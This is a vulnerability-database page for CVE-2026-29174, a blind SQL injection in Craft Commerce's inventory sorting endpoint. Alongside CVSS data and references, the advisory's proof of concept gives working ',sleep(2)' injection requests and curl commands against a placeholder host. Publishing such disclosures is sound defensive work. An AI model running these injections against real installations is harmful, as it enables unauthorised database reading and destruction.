Vulnerability-Lookup

CVE-2026-29174 (GCVE-0-2026-29174)

Vulnerability from cvelistv5 – Published: 2026-03-10 19:55 – Updated: 2026-03-10 20:12

Title

Craft Commerce has a SQL Injection in Commerce Inventory Table Sorting

Summary

Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise. This vulnerability is fixed in 5.5.3.

Severity ?

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/craftcms/commerce/security/adv…	x_refsource_CONFIRM
	https://github.com/craftcms/commerce/commit/094d6…	x_refsource_MISC
	https://github.com/craftcms/commerce/commit/a2ea8…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	craftcms	commerce	Affected: >= 5.0.0 < 5.5.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-29174",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-10T20:09:58.081841Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-10T20:12:39.918Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "commerce",
          "vendor": "craftcms",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 5.0.0 \u003c 5.5.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise. This vulnerability is fixed in 5.5.3."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-10T19:55:54.645Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j"
        },
        {
          "name": "https://github.com/craftcms/commerce/commit/094d69df24b925544f337c38e2ec1effcd5395c7",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/craftcms/commerce/commit/094d69df24b925544f337c38e2ec1effcd5395c7"
        },
        {
          "name": "https://github.com/craftcms/commerce/commit/a2ea853935ef03297ea1298bdb0d8c55ec5daf7b",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/craftcms/commerce/commit/a2ea853935ef03297ea1298bdb0d8c55ec5daf7b"
        }
      ],
      "source": {
        "advisory": "GHSA-pmgj-gmm4-jh6j",
        "discovery": "UNKNOWN"
      },
      "title": "Craft Commerce has a SQL Injection in Commerce Inventory Table Sorting"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-29174",
    "datePublished": "2026-03-10T19:55:54.645Z",
    "dateReserved": "2026-03-04T14:44:00.713Z",
    "dateUpdated": "2026-03-10T20:12:39.918Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-29174",
      "date": "2026-04-17",
      "epss": "0.00013",
      "percentile": "0.02025"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-29174\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-10T20:16:38.550\",\"lastModified\":\"2026-03-11T16:55:03.400\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise. This vulnerability is fixed in 5.5.3.\"},{\"lang\":\"es\",\"value\":\"Craft Commerce es una plataforma de comercio electr\u00f3nico para Craft CMS. Antes de la versi\u00f3n 5.5.3, Craft Commerce es vulnerable a una inyecci\u00f3n SQL en el endpoint de datos de la tabla de niveles de inventario. Los par\u00e1metros sort[0][direction] y sort[0][sortField] se concatenan directamente en una cl\u00e1usula addOrderBy() sin ninguna validaci\u00f3n o saneamiento. Un atacante autenticado con acceso a la secci\u00f3n de Inventario de Commerce puede inyectar consultas SQL arbitrarias, lo que podr\u00eda llevar a un compromiso total de la base de datos. Esta vulnerabilidad se corrige en la versi\u00f3n 5.5.3.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*\",\"versionStartIncluding\":\"5.0.0\",\"versionEndExcluding\":\"5.5.3\",\"matchCriteriaId\":\"2690BD5E-2A88-4CDC-AAD6-DD02B96E1A46\"}]}]}],\"references\":[{\"url\":\"https://github.com/craftcms/commerce/commit/094d69df24b925544f337c38e2ec1effcd5395c7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/craftcms/commerce/commit/a2ea853935ef03297ea1298bdb0d8c55ec5daf7b\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-29174\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-10T20:09:58.081841Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-10T20:11:48.646Z\"}}], \"cna\": {\"title\": \"Craft Commerce has a SQL Injection in Commerce Inventory Table Sorting\", \"source\": {\"advisory\": \"GHSA-pmgj-gmm4-jh6j\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"craftcms\", \"product\": \"commerce\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 5.0.0 \u003c 5.5.3\"}]}], \"references\": [{\"url\": \"https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j\", \"name\": \"https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/craftcms/commerce/commit/094d69df24b925544f337c38e2ec1effcd5395c7\", \"name\": \"https://github.com/craftcms/commerce/commit/094d69df24b925544f337c38e2ec1effcd5395c7\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/craftcms/commerce/commit/a2ea853935ef03297ea1298bdb0d8c55ec5daf7b\", \"name\": \"https://github.com/craftcms/commerce/commit/a2ea853935ef03297ea1298bdb0d8c55ec5daf7b\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise. This vulnerability is fixed in 5.5.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-10T19:55:54.645Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-29174\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-10T20:12:39.918Z\", \"dateReserved\": \"2026-03-04T14:44:00.713Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-10T19:55:54.645Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-29174

Vulnerability from fkie_nvd - Published: 2026-03-10 20:16 - Updated: 2026-03-11 16:55

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/craftcms/commerce/commit/094d69df24b925544f337c38e2ec1effcd5395c7	Patch
security-advisories@github.com	https://github.com/craftcms/commerce/commit/a2ea853935ef03297ea1298bdb0d8c55ec5daf7b	Patch
security-advisories@github.com	https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	craftcms	craft_commerce	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*",
              "matchCriteriaId": "2690BD5E-2A88-4CDC-AAD6-DD02B96E1A46",
              "versionEndExcluding": "5.5.3",
              "versionStartIncluding": "5.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise. This vulnerability is fixed in 5.5.3."
    },
    {
      "lang": "es",
      "value": "Craft Commerce es una plataforma de comercio electr\u00f3nico para Craft CMS. Antes de la versi\u00f3n 5.5.3, Craft Commerce es vulnerable a una inyecci\u00f3n SQL en el endpoint de datos de la tabla de niveles de inventario. Los par\u00e1metros sort[0][direction] y sort[0][sortField] se concatenan directamente en una cl\u00e1usula addOrderBy() sin ninguna validaci\u00f3n o saneamiento. Un atacante autenticado con acceso a la secci\u00f3n de Inventario de Commerce puede inyectar consultas SQL arbitrarias, lo que podr\u00eda llevar a un compromiso total de la base de datos. Esta vulnerabilidad se corrige en la versi\u00f3n 5.5.3."
    }
  ],
  "id": "CVE-2026-29174",
  "lastModified": "2026-03-11T16:55:03.400",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-10T20:16:38.550",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/craftcms/commerce/commit/094d69df24b925544f337c38e2ec1effcd5395c7"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/craftcms/commerce/commit/a2ea853935ef03297ea1298bdb0d8c55ec5daf7b"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-PMGJ-GMM4-JH6J

Vulnerability from github – Published: 2026-03-10 18:23 – Updated: 2026-03-10 22:54

Summary

Craft Commerce is vulnerable to SQL Injection in Commerce Inventory Table Sorting

Details

Summary

Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise.

PoC

Required Permissions

General
- Access the control panel
- Access Craft Commerce
Craft Commerce
- Manage inventory stock levels

Steps to reproduce

Log in to the control panel
Navigate to Commerce > Inventory
Click on any sortable column header (e.g., "SKU") to trigger a sort request
Intercept the request and modify sort[0][direction] or sort[0][sortField] parameters and append ,sleep(2) payload to it's current value as follows:

# sort[0][sortField]=sku,sleep(2)
GET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku,sleep(2)&sort[0][direction]=asc&inventoryLocationId=1&containerId=%23inventory-levels
# sort[0][direction]=asc,sleep(2)
GET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku&sort[0][direction]=asc,sleep(2)&inventoryLocationId=1&containerId=%23inventory-levels

Observe the delay in the response, confirming the injection

Alternatively, you can use the following curl (bash syntax) command (replace cookie and target domain as needed):

# sort[0][sortField]=sku,sleep(2)
curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku,sleep(2)&sort%5b0%5d%5bdirection%5d=asc&page=1&per_page=25&inventoryLocationId=1&containerId=%23inventory-levels'
# sort[0][direction]=asc,sleep(2)
curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku&sort%5b0%5d%5bdirection%5d=asc,sleep(2)&page=1&per_page=25&inventoryLocationId=1&containerId=%23inventory-levels'

Impact

With this Blind SQLi, an attacker can: - Exfiltrate data character-by-character using time-based techniques. - Modify or destroy data (drop tables, update records, alter schema).

Severity ?

8.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.5.2"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/commerce"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29174"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-10T18:23:25Z",
    "nvd_published_at": "2026-03-10T20:16:38Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nCraft Commerce is vulnerable to **SQL Injection** in the inventory levels table data endpoint. The `sort[0][direction]` and `sort[0][sortField]` parameters are concatenated directly into an `addOrderBy()` clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise.\n\n---\n## PoC\n### Required Permissions\n- General\n\t- Access the control panel\n\t- Access Craft Commerce\n- Craft Commerce\n\t- Manage inventory stock levels \n\n### Steps to reproduce\n1. Log in to the control panel\n2. Navigate to **Commerce** \u003e **Inventory**\n3. Click on any sortable column header (e.g., \"SKU\") to trigger a sort request\n4. Intercept the request and modify `sort[0][direction]` or `sort[0][sortField]` parameters and append `,sleep(2)` payload to it\u0027s current value as follows:\n\n```bash\n# sort[0][sortField]=sku,sleep(2)\nGET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data\u0026sort[0][sortField]=sku,sleep(2)\u0026sort[0][direction]=asc\u0026inventoryLocationId=1\u0026containerId=%23inventory-levels\n# sort[0][direction]=asc,sleep(2)\nGET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data\u0026sort[0][sortField]=sku\u0026sort[0][direction]=asc,sleep(2)\u0026inventoryLocationId=1\u0026containerId=%23inventory-levels\n```\n\n6. Observe the delay in the response, confirming the injection\n\nAlternatively, you can use the following `curl` (bash syntax) command (replace cookie and target domain as needed):\n```bash\n# sort[0][sortField]=sku,sleep(2)\ncurl --path-as-is -k -H $\u0027User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0\u0027 -H $\u0027Accept: application/json, text/plain, */*\u0027 -b $\u0027\u003cCookie\u003e\u0027 $\u0027http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data\u0026sort%5b0%5d%5bfield%5d=purchasable\u0026sort%5b0%5d%5bsortField%5d=sku,sleep(2)\u0026sort%5b0%5d%5bdirection%5d=asc\u0026page=1\u0026per_page=25\u0026inventoryLocationId=1\u0026containerId=%23inventory-levels\u0027\n# sort[0][direction]=asc,sleep(2)\ncurl --path-as-is -k -H $\u0027User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0\u0027 -H $\u0027Accept: application/json, text/plain, */*\u0027 -b $\u0027\u003cCookie\u003e\u0027 $\u0027http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data\u0026sort%5b0%5d%5bfield%5d=purchasable\u0026sort%5b0%5d%5bsortField%5d=sku\u0026sort%5b0%5d%5bdirection%5d=asc,sleep(2)\u0026page=1\u0026per_page=25\u0026inventoryLocationId=1\u0026containerId=%23inventory-levels\u0027\n```\n\n### Impact\nWith this Blind SQLi, an attacker can:\n- **Exfiltrate data** character-by-character using time-based techniques.\n- **Modify or destroy data** (drop tables, update records, alter schema).",
  "id": "GHSA-pmgj-gmm4-jh6j",
  "modified": "2026-03-10T22:54:57Z",
  "published": "2026-03-10T18:23:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29174"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/commit/094d69df24b925544f337c38e2ec1effcd5395c7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/commit/a2ea853935ef03297ea1298bdb0d8c55ec5daf7b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/commerce"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft Commerce is vulnerable to SQL Injection in Commerce Inventory Table Sorting"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-29174 (GCVE-0-2026-29174)

FKIE_CVE-2026-29174

GHSA-PMGJ-GMM4-JH6J

Summary

PoC

Required Permissions

Steps to reproduce

Impact

Tags

Sightings

Nomenclature